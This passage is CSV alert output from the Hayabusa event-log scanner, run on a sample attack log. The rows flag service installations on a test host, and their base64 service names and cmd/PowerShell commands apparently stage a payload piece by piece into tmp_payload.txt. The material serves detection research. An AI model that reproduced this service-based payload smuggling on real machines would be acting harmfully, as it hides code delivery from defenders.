+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 